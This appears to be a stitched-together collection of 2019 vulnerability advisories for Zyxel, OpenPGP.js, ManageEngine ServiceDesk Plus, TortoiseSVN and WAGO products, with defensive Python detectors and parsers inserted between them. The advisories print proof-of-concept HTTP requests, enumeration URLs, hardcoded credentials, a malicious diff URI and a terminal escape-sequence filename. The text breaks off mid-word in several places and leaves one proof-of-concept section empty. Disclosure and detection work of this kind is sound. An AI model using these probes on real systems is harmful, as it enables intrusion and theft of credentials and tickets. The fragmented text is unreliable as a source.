Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues.
Vulnerability overview/description:
---
1) Information Disclosure via Unauthenticated External DNS Requests
A DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall.

Proof of concept:
---
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the domain "subdomain.domain.com":
---
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

arip=subdomain.domain.com
---

The following GET request can be used for the same purpose:
---
GET /redirect.cgi?arip=subdomain.domain.com_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
---

If the domain can be resolved, the response contains the resolved IP address within the cookie value:
---
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099

[...]
---

If the domain cannot be resolved, a redirection will be returned:
---
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1

[...]
---

Vulnerable / tested versions:
---
The following versions have been tested, other versions might be affected as well:
Zyxel USG110 ZLD 4.33
Zyxel USG210 ZLD 4.33
Zyxel USG310 ZLD 4.33
Zyxel USG1100 ZLD 4.33
Zyxel USG1900 ZLD 4.33
Zyxel USG2200-VPN ZLD 4.33
Zyxel UAG2100 ZLD 4.18
Zyxel UAG4100 ZLD 4.18

The vendor provided the following list of affected devices:
Zyxel ATP200
SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 >
=======================================================================
              title: Hardcoded FTP Credentials
            product: Zyxel NWA/NAP/WAC wireless access point series
 vulnerable version: see "Vulnerable / tested version"
      fixed version: see "Solution"
         CVE number: -
             impact: medium
           homepage: https://www.zyxel.com
              found: 2019-06-19
                 by: Thomas Weber (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications Corp.
has been connecting people to the internet for nearly 30 years. We keep
promoting creativity which meets the needs of customers. This spirit has
never been changed since we developed the world's first integrated 3-in-1
data/fax/voice modem in 1992. Our ability to adapt and innovate with
networking technology places us at the forefront of understanding
connectivity for telco/service providers, businesses and home users. We're
building the networks of tomorrow, helping unlock the world's potential and
meeting the needs of the modern workplace; powering people at work, life and
play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.

Vulnerability overview/description:
-----------------------------------
1) Hardcoded FTP Credentials
The Zyxel wireless access point runs an FTP service that serves the
configuration files of the WiFi networks. This FTP server can be accessed
with hardcoded credentials embedded in the firmware of the AP. Because the
configuration files contain the SSIDs and passphrases of all configured
WLANs, an attacker who can reach the FTP service from one WiFi network can
fetch the passphrases of WLANs bound to other VLANs and cross into those
networks. The credentials were found by doing an automated scan with IoT
Inspector.

Proof of concept:
-----------------
1) Hardcoded FTP Credentials
The username "devicehaecived" and the password "1234" can be used to access
the FTP server of the AP on port 21. The content of the FTP server looks like
the following listing:
---
$ ls
cert
conf
debug
idp
packet_trace
script
tmp
wtp_image
---
The directory "conf" contains all configuration files which store the WiFi
SSIDs and passphrases.

Vulnerable / tested versions:
-----------------------------
The following versions have been manually tested and were automatically
verified with IoT Inspector:
Zyxel NWA5121-NI       5.50 patch 0 and earlier
Zyxel NWA5121-N        5.50 patch 0 and earlier

The vendor provided the following list of affected devices:
Zyxel WAC6103D-I       5.50 patch 0 and earlier
Zyxel WAC6303D-S       5.50 patch 0 and earlier
Zyxel WAC6502D-E       5.50 patch 0 and earlier
Zyxel WAC6502D-S       5.50 patch 0 and earlier
Zyxel WAC6503D-S       5.50 patch 0 and earlier
Zyxel WAC6553D-E       5.50 patch 0 and earlier
Zyxel WAC6552D-S       5.50 patch 0 and earlier
Zyxel WAC5302D-S       5.50 patch 0 and earlier
Zyxel NWA5123-AC       5.50 patch 0 and earlier
Zyxel NWA5123-AC HD    5.50 patch 0 and earlier
Zyxel NWA5123-NI       5.50 patch 0 and earlier
Zyxel NWA5301-NJ       5.50 patch 0 and earlier
Zyxel NWA1302-AC       5.50 patch 0 and earlier
Zyxel NWA1123-ACv2     5.50 patch 0 and earlier
Zyxel NWA1123-AC HD    5.50 patch 0 and earlier
Zyxel NWA1123-AC PRO   5.50 patch 0 and earlier
Zyxel NAP102           5.50 patch 0 and earlier
Zy

xel NAP203           5.50 patch 0 and earlier
Zyxel NAP303           5.50 patch 0 and earlier
Zyxel NAP353           5.50 patch 0 and earlier

Vendor contact timeline:
------------------------
2019-06-26: Contacting vendor through secur...@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
            confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they
SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: OpenPGP.js
 vulnerable version: <=4.2.0
      fixed version: 4.3.0
         CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155
             impact: critical
           homepage: https://openpgpjs.org/
              found: 2018-2019
                 by: Wolfgang Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"This project aims to provide an Open Source OpenPGP library in JavaScript so
it can be used on virtually every device. Instead of other implementations
that are aimed at using native code, OpenPGP.js is meant to bypass this
requirement (i.e. people will not have to install gpg on their machines in
order to use the library). The idea is to implement all the needed OpenPGP
functionality in a JavaScript library that can be reused in other projects
that provide browser extensions or server applications. It should allow you
to sign, encrypt, decrypt, and verify any kind of text - in particular
e-mails - as well as managing keys."

URL: https://openpgpjs.org/

Business recommendation:
------------------------
SEC Consult was tasked by the German Bundesamt für Sicherheit in der
Informationstechnik (BSI) with conducting a security audit of the Mailvelope
browser extension as well as the parts of OpenPGP.js used by Mailvelope.
During the course of this audit multiple security vulnerabilities with
severities ranging from minor to critical have been identified. Some of the
vulnerabilities with higher severity are published as an advisory.

A more detailed description of the vulnerabilities as well as a description
of other vulnerabilities found during this project can be found in the report
that has been made available by the BSI:
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html

Vulnerability overview/description:
-----------------------------------
1) Message Signature Bypass (CVE-2019-9153)
OpenPGP defines several types of signatures, each carrying a different
semantic. Signatures are implemented as packets and each signature packet can
contain subpackets. To sign a message (e.g. a signed e-mail), the signature
type "text" is used; a text signature covers both its hashed subpackets and
the signed text.

During verification of a message signature, OpenPGP.js does not verify that
the signature is of type text. An attacker can therefore construct a message
that contains a signature of another type instead. Because the input that
enters the hash depends on the signature type, the attacker can pick a type
that only covers its own subpackets and requires no further input: a valid
"standalone" or "timestamp" signature packet made by another person can be
attached to an arbitrary message, and OpenPGP.js incorrectly reports that
message as signed by that person.

2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154)
OpenPGP signature subpackets contain information related to a signature (e.g.
the creation timestamp). These subpackets may appear in a "hashed" and in an
"unhashed" subpacket area. The information in the hashed area is covered by
the signature; the unhashed area is not cryptographically protected at all.

OpenPGP.js however does not distinguish between the two. When parsing a
signature packet, the hashed subpackets are parsed first; when the unhashed
subpackets are read afterwards, they overwrite the values taken from the
hashed subpackets. An attacker can therefore arbitrarily modify the contents
of e.g. a key certification signature or a revocation signature without
invalidating it. As a result, the attacker could e.g. convince a victim to use
an obsolete key for encryption.

3) Invalid Curve Attack (CVE-2019-9155)
The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key exchange
does not verify that the communication partner's public key is valid (i.e.
that the point lies on the elliptic curve). Because the curve equation is
never checked, the scalar multiplication with the victim's private key is
effectively carried out on an altered curve chosen by the attacker rather
than on the specified one. Each such curve can be chosen to contain a point
of small order, so whether decryption fails or succeeds reveals the private
scalar modulo that small order; combining the residues obtained from several
altered curves (Chinese remainder theorem) recovers the victim's private key.

This attack requires the attacker to be able to provide multiple manipulated
messages and to observe whether decryption fails.

Proof of concept:
-----------------
SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 >
=======================================================================
              title: Unauthenticated sensitive information leakage
            product: Zoho Corporation ManageEngine ServiceDesk Plus
 vulnerable version: v10 <10509
      fixed version: v10 >=10509
         CVE number: CVE-2019-15045, CVE-2019-15046
             impact: Critical
           homepage: https://www.manageengine.com/products/service-desk/
              found: 2019-06-27
                 by: Johannes Greil (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/

Business recommendation:
------------------------
The vendor provides a patched version and it should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and further critical issues are to be
expected. A workaround exists for mitigating vulnerability 1b (user
enumeration).

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated sensitive information leakage

a) Unauthenticated download of internal support ticket information
   (CVE-2019-15046)
The "fosagent" component can be used by an unauthenticated attacker to
retrieve internal "events". In our test it was possible to access sensitive
internal information (tickets) written by users of this application in
exchange with the support team. Depending on the contents of the tickets,
sensitive data might leak through this functionality. Which information ends
up in those "events" most likely also depends on the configuration of
ServiceDesk Plus.

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
Valid usernames can be collected by interacting with the "AjaxDomainServlet"
function of the application without prior authentication. This makes brute
force attacks more efficient: once a username is known, only the password
remains to be found. Furthermore, the servlet reveals whether the user is a
locally configured or a domain user and leaks the internal domain name of
the requested user account.

According to the vendor, the affected feature is intended behaviour and a
workaround in order to disable it has been provided (see further below).

Proof of concept:
-----------------
1) Unauthenticated sensitive information leakage

a) Unauthenticated download of internal support ticket information
   (CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet which an
unauthenticated attacker can use in order to iterate through existing
internal "events". The information that can be downloaded looks like internal
ticket system information and other data exchanged between users and the help
desk support team. The "log-pos" parameter takes a number, a colon and a
second number that selects the corresponding event index; an attacker can
simply increment those numbers to access different information:

https://$IP/fosagent/repl/download-file?log-pos=1:0

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts
configured within ManageEngine ServiceDesk Plus. No prior authentication is
required. The "search" parameter is used for supplying the user account name:

https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=$USER

If the user exists and is a local user (configured within the web
application), the response is "Not in Domain". If the user exists and is a
domain user (e.g. LDAP), the response is the corresponding internal domain
name. If the page stays empty, the user does not exist.

Vulnerable / tested versions:
-----------------------------
Version 10 has been tested. The vendor did not confirm whether older
releases are affected as well.

Vendor contact timeline:
------------------------
2019-07-02: Contacting vendor through ManageEngine Security Response Center
            (MESRC). Uploaded security ad
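Both the Zyxel "redirect.cgi" DNS oracle from SA-20190829-1 above and the two unauthenticated ServiceDesk Plus endpoints from this advisory only become useful to an attacker through many requests with varying guesses (host names, event indices, user names), which is also what makes them visible. The following detection logic is an added example and not code from SEC Consult, Zyxel or Zoho. It assumes the requests are recorded in Apache/nginx combined log format, for instance by a reverse proxy in front of the device (neither advisory states what the products themselves log), and the log lines below are constructed. Thresholds, rule names and the sample addresses are illustrative choices.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, ident, user, [time], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# rule name -> (endpoint path, query parameter carrying the attacker's guess,
#               number of distinct guesses from one source that count as enumeration)
RULES = {
    "zyxel-dns-oracle": ("/redirect.cgi", "arip", 3),
    "sdp-event-download": ("/fosagent/repl/download-file", "log-pos", 3),
    "sdp-user-enum": ("/domainServlet/AJaxDomainServlet", "search", 3),
}


def parse_line(line):
    """Split one combined-format line into (src, method, path, query, status);
    returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    return m["src"], m["method"], url.path, parse_qs(url.query), int(m["status"])


def detect(lines):
    """Return {(src, rule): sorted distinct guesses} for every source whose
    requests to one of the endpoints reach that rule's threshold.  POST bodies
    are not logged, so a POST to redirect.cgi counts as one guess even though
    its "arip" value is invisible in the log."""
    guesses = defaultdict(set)
    posts = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, method, path, query, _status = parsed
        for name, (endpoint, param, _threshold) in RULES.items():
            if path != endpoint:
                continue
            key = (src, name)
            guesses[key].update(query.get(param, []))
            if method == "POST":
                posts[key] += 1
    return {
        key: sorted(vals)
        for key, vals in guesses.items()
        if max(len(vals), posts[key]) >= RULES[key[1]][2]
    }


# Constructed sample: one host probes three internal names through the Zyxel
# oracle, another iterates ServiceDesk Plus events and tries two user names.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jun/2019:08:11:57 +0000] "GET /redirect.cgi?arip=intranet.corp.example&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 302 220 "-" "curl/7.64.0"
203.0.113.7 - - [24/Jun/2019:08:12:02 +0000] "GET /redirect.cgi?arip=mail.corp.example&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 200 9099 "-" "curl/7.64.0"
203.0.113.7 - - [24/Jun/2019:08:12:09 +0000] "GET /redirect.cgi?arip=vpn.corp.example&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 200 9099 "-" "curl/7.64.0"
198.51.100.4 - - [27/Jun/2019:10:02:11 +0000] "GET /fosagent/repl/download-file?log-pos=1:0 HTTP/1.1" 200 4120 "-" "python-requests/2.22.0"
198.51.100.4 - - [27/Jun/2019:10:02:12 +0000] "GET /fosagent/repl/download-file?log-pos=1:1 HTTP/1.1" 200 3988 "-" "python-requests/2.22.0"
198.51.100.4 - - [27/Jun/2019:10:02:13 +0000] "GET /fosagent/repl/download-file?log-pos=1:2 HTTP/1.1" 200 4207 "-" "python-requests/2.22.0"
198.51.100.4 - - [27/Jun/2019:10:03:40 +0000] "GET /domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=jdoe HTTP/1.1" 200 13 "-" "python-requests/2.22.0"
198.51.100.4 - - [27/Jun/2019:10:03:41 +0000] "GET /domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=admin HTTP/1.1" 200 13 "-" "python-requests/2.22.0"
192.0.2.10 - - [27/Jun/2019:10:05:00 +0000] "GET /redirect.cgi?arip=printer.corp.example&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 200 9099 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for (src, rule), values in sorted(detect(SAMPLE_LOG.splitlines()).items()):
        print(f"{src} {rule}: {len(values)} distinct guesses, e.g. {values[:3]}")
```

Run against the sample, the Zyxel probing host and the event iteration are reported, while the single printer lookup and the two user-name guesses stay below the threshold; in a real deployment the threshold should be tuned to how often legitimate clients hit these endpoints, and for the Zyxel oracle the 302/200 split in the status column additionally tells which names resolved.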
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
Document Title:
===============
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2188

Product: https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422

CVE-ID:
=======
CVE-2019-14422

Release Date:
=============
2019-08-13

Vulnerability Laboratory ID (VL-ID):
====================================
2188

Common Vulnerability Scoring System:
====================================
8.8

Vulnerability Class:
====================
Code Execution

Current Estimated Price:
========================
4.000€ - 5.000€

Product & Service Introduction:
===============================
TortoiseSVN is a really easy to use Revision control / version control /
source control software for Windows. It is based on Apache Subversion (SVN);
TortoiseSVN provides a nice and easy user interface for Subversion. It is
developed under the GPL. Which means it is completely free for anyone to use,
including in a commercial environment, without any restriction. The source
code is also freely available, so you can even develop your own version if
you wish to. Since it's not an integration for a specific IDE like Visual
Studio, Eclipse or others, you can use it with whatever development tools
you like, and with any type of file.

(Copy of the about page: https://tortoisesvn.net/about.html )

Abstract Advisory Information:
==============================
A vulnerability laboratory researcher (vxrl team) discovered a remote code
execution vulnerability in the TortoiseSVN v1.12.1 software.

Vulnerability Disclosure Timeline:
==================================
2019-08-13: Public Disclosure (Vulnerability Laboratory)

Affected Product(s):
====================
TortoiseSVN
Product: TortoiseSVN - Software 1.12.1

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Pre auth - no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A remote code execution vulnerability has been uncovered in the official
TortoiseSVN v1.12.1 software. The vulnerability allows remote attackers to
execute arbitrary code and compromise the target computer system.

The URI handler of TortoiseSVN (tsvncmd:) allows a customised diff operation
on Excel workbooks, which can be used to open remote workbooks without the
protection of Excel's macro security settings and thereby execute arbitrary
code. The URL `tsvncmd:command:diff?path:[file1]?path2:[file2]` executes a
customised diff on [file1] and [file2] based on the file extension. For .xls
files it runs the script `diff-xls.js` via wscript, which opens both files
for comparison without any macro security warning. An attacker can exploit
this by placing a workbook with a malicious macro on a network drive and
forcing the victim to open it through such a URL, so that the macro inside
is executed. Since the macro is triggered through wscript, the macro can kill
the wscript process and quit Excel after its code has run, which makes the
attack less visible.

Proof of Concept (PoC):
=======================
The vulnerability can be triggered by visiting a specially crafted URL in a
web browser. To reproduce it, create a .url file or open the URL directly in
a browser; a notification prompt may be shown in the latter case.

Check out the repository with TortoiseSVN, where VBoxSvr is the remote
network drive controlled by the attacker, v.xlsm is the workbook carrying the
malicious macro and w.xlsx is just an empty Excel workbook.

Sources:
https://www.vulnerability-lab.com/resources/documents/2188.rar
Password: 23vxrl23

PoC: Video
https://www.youtube.com/watch?v=spvRSC377vI

Security Risk:
==============
The security risk of the remote code execution vulnerability in the software
component is estimated as high.

Credits & Authors:
==================
PingFanZettaKe [VXRL Team] - https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states
do not allow the exclusion or limitation of liability for consequenti
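The root of the issue above is that a URL reachable from any web page ends up selecting two file paths that are handed to a diff script, and nothing stops those paths from pointing at an attacker's share. The following parser for the `tsvncmd:command:diff?path:...?path2:...` form is an added example, not TortoiseSVN's own code and not the fix the project shipped; it shows the check a handler invoked from a browser should make before touching any file: refuse UNC paths. It uses ntpath so it runs on any platform, and the share name \\VBoxSvr and the file names are taken from the PoC text as hypothetical values.

```python
import ntpath
from urllib.parse import unquote


def parse_tsvncmd(uri):
    """Parse the tsvncmd:command:<cmd>?<key>:<value>?... form quoted above.
    Values may themselves contain ':' (drive letters), so each segment is
    split only at its first colon.  Returns (command, {key: value})."""
    scheme, sep, rest = uri.partition(":")
    if scheme.lower() != "tsvncmd" or not sep:
        raise ValueError("not a tsvncmd: URI")
    segments = unquote(rest).split("?")
    head, sep, command = segments[0].partition(":")
    if head != "command" or not command:
        raise ValueError("missing command segment")
    params = {}
    for segment in segments[1:]:
        key, sep, value = segment.partition(":")
        if not sep or not key or key in params:
            raise ValueError(f"malformed or duplicate parameter: {segment!r}")
        params[key] = value
    return command, params


def is_remote_path(path):
    """True for UNC paths (\\\\server\\share\\...).  A drive letter mapped to a
    network share cannot be recognised offline and is not covered here."""
    drive, _tail = ntpath.splitdrive(path)
    return drive.startswith(("\\\\", "//"))


def diff_targets(uri):
    """Return the two files a 'diff' command would compare, or raise if the
    command is not 'diff' or any target lies on a remote share."""
    command, params = parse_tsvncmd(uri)
    if command != "diff":
        raise ValueError(f"unsupported command {command!r}")
    targets = [params[key] for key in ("path", "path2") if key in params]
    if len(targets) != 2:
        raise ValueError("diff needs both 'path' and 'path2'")
    for target in targets:
        if is_remote_path(target):
            raise ValueError(f"refusing remote path {target!r}")
    return targets


# Constructed URIs: the first mirrors the attack (hypothetical share \\VBoxSvr),
# the second compares two local workbooks.
ATTACK_URI = r"tsvncmd:command:diff?path:\\VBoxSvr\share\w.xlsx?path2:\\VBoxSvr\share\v.xlsm"
LOCAL_URI = r"tsvncmd:command:diff?path:C:\work\a.xls?path2:C:\work\b.xls"

if __name__ == "__main__":
    print("local diff targets:", diff_targets(LOCAL_URI))
    try:
        diff_targets(ATTACK_URI)
    except ValueError as err:
        print("blocked:", err)
```

Refusing UNC paths closes the scenario in the PoC but not one where the victim has already mapped the attacker's share to a drive letter; a handler that is reachable from untrusted URLs should additionally restrict itself to files inside the working copy and never run extension-specific scripts on a file it did not itself create.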
SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: WAGO 852 Industrial Managed Switch Series
 vulnerable version: 852-303:
           homepage: https://www.wago.com
              found: 2019-03-08
                 by: T. Weber (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"New ideas are the driving force behind our success
WAGO is a family-owned company headquartered in Minden, Germany.
Independently operating for three generations, WAGO is the global leader of
spring pressure electrical interconnect and automation solutions. For more
than 60 years, WAGO has developed and produced innovative products for
packaging, transportation, process, industrial and building automation
markets amongst others. Aside from its innovations in spring pressure
connection technology, WAGO has introduced numerous innovations that have
revolutionized industry. Further ground-breaking inventions include: the
WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

Business recommendation:
------------------------
SEC Consult recommends to immediately apply the available patches from the
vendor. A thorough security review should be performed by security
professionals to identify further potential security issues.

Vulnerability overview/description:
-----------------------------------
The industrial managed switch series 852 from WAGO is affected by multiple
vulnerabilities such as old software components embedded in the firmware.
Furthermore, hardcoded password hashes and credentials were also found by
doing an automated scan with IoT Inspector. Two vulnerabilities
(CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with
the MEDUSA scalable firmware runtime. The validity of the password hashes and
the embedded keys were also verified by emulating the device.

1) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.12.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2017-16544) was verified by using the
MEDUSA scalable firmware runtime.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.8 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of the
discovered vulnerabilities (CVE-2015-0235, "GHOST") was verified by using the
MEDUSA scalable firmware runtime.

3) Hardcoded Credentials (CVE-2019-12550)
The device contains hardcoded users and passwords which can be used to login
via SSH and Telnet.

4) Embedded Private Keys (CVE-2019-12549)
The device contains hardcoded private keys for the SSH daemon. The
fingerprint of the SSH host key presented by the running SSH daemon matches
the embedded private key, i.e. every device ships with the same host key and
anyone holding the firmware can impersonate or decrypt sessions to it.

Proof of concept:
-----------------
1) Known BusyBox Vulnerabilities
BusyBox version 1.12.0 contains multiple CVEs like: CVE-2013-1813,
CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, CVE-2015-9261,
CVE-2016-2147 and more.

The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified
on an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was
created to trigger the vulnerability: the embedded escape sequences are
written unfiltered to the terminal when the shell autocompletes the name.
---
# ls [pressing TAB]
test
]55;test.txt
#
---

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.8 contains multiple CVEs like: CVE-2010-0296,
CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, CVE-2014-9761,
CVE-2014-9984, CVE-2015-1472 and more.

The gethostbyname buffer overflow vulnerability (GHOST) was checked with the
help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It
was compiled and executed on the emulated device to test the system.

3) Hardcoded Credentials (CVE-2019-12550)
The following credentials were found in the 'passwd' file of the firmware:

root    No password is set for the account [EMPTY PASSWORD]
admin

By using these credentials, it's possible to connect via Telnet and SSH on
the emulated device. Example for Telnet:
---
[root@localhost ~]# telnet 192.168.0.133
Trying 192.168.0.133...
Connected to 192.168.0.133.
Escape cha
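Finding 3) above comes down to what the firmware's passwd file says about each account, which is something that can be checked offline on any unpacked root filesystem before a device is ever emulated. The following audit is an added example (not code from SEC Consult, IoT Inspector or WAGO). It reads a passwd/shadow pair and reports the conditions that matter for hardcoded-credential findings: accounts that can log in with an empty password, password hashes kept in the world-readable passwd file instead of shadow, weak hash formats that are cheap to crack, a second UID 0 account, and "x" entries with no matching shadow line. The two sample files are constructed: root and admin carry an empty password field to mirror the finding, the other entries are invented for illustration.

```python
from dataclasses import dataclass

EMPTY_PASSWORD = "empty-password"      # login without any credential
HASH_IN_PASSWD = "hash-in-passwd"      # hash readable by every local user
WEAK_HASH = "weak-hash"                # DES or MD5-crypt, cheap to crack offline
EXTRA_UID0 = "extra-uid0"              # second superuser account
MISSING_SHADOW = "missing-shadow"      # passwd says "x" but shadow has no entry
LOCKED = ("*", "!", "!!", "x")
NOLOGIN_SHELLS = ("", "/bin/false", "/sbin/nologin", "/usr/sbin/nologin")


@dataclass(frozen=True)
class Finding:
    user: str
    issue: str


def parse_colon_file(text):
    """Yield the colon-separated fields of each non-empty, non-comment line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line.split(":")


def is_weak_hash(value):
    """Traditional 13-character DES crypt or $1$ MD5-crypt."""
    return value.startswith("$1$") or (len(value) == 13 and "$" not in value)


def audit_accounts(passwd_text, shadow_text=""):
    """Return Findings for an extracted firmware's passwd/shadow pair."""
    findings = []
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text) if len(f) >= 2}
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 7:
            continue
        user, pw, uid, _gid, _gecos, _home, shell = fields[:7]
        can_login = shell not in NOLOGIN_SHELLS
        if uid == "0" and user != "root":
            findings.append(Finding(user, EXTRA_UID0))
        if pw == "x":                           # password lives in shadow
            if user not in shadow:
                findings.append(Finding(user, MISSING_SHADOW))
                continue
            effective = shadow[user]
        else:
            effective = pw
            if pw not in LOCKED and pw != "":
                findings.append(Finding(user, HASH_IN_PASSWD))
        if effective == "" and can_login:
            findings.append(Finding(user, EMPTY_PASSWORD))
        elif effective not in LOCKED and is_weak_hash(effective):
            findings.append(Finding(user, WEAK_HASH))
    return findings


# Constructed sample modelled on the finding above: root and admin carry an
# empty password field; the remaining accounts are invented for illustration.
PASSWD = """\
root::0:0:root:/root:/bin/sh
admin::1000:1000:admin:/home/admin:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
service:$1$saltsalt$AbCdEfGhIjKlMnOpQrStU.:500:500::/var/service:/bin/sh
backup:x:501:501::/var/backup:/bin/sh
www:x:33:33::/var/www:/bin/false
"""
SHADOW = """\
backup:$6$saltsalt$constructedHashValueForIllustrationOnly:17000:0:99999:7:::
www:*:17000:0:99999:7:::
"""

if __name__ == "__main__":
    for finding in audit_accounts(PASSWD, SHADOW):
        print(f"{finding.user:10} {finding.issue}")
```

On the sample this reports root and admin for empty passwords and the "service" account twice, once because its hash sits in passwd and once because it is MD5-crypt; "backup" with a SHA-512-crypt hash in shadow and the locked "daemon" and "www" accounts produce nothing. Whether a reported hash is actually a hardcoded default still has to be confirmed the way the advisory did, by cracking it or logging in on an emulated device.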
SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
=======================================================================
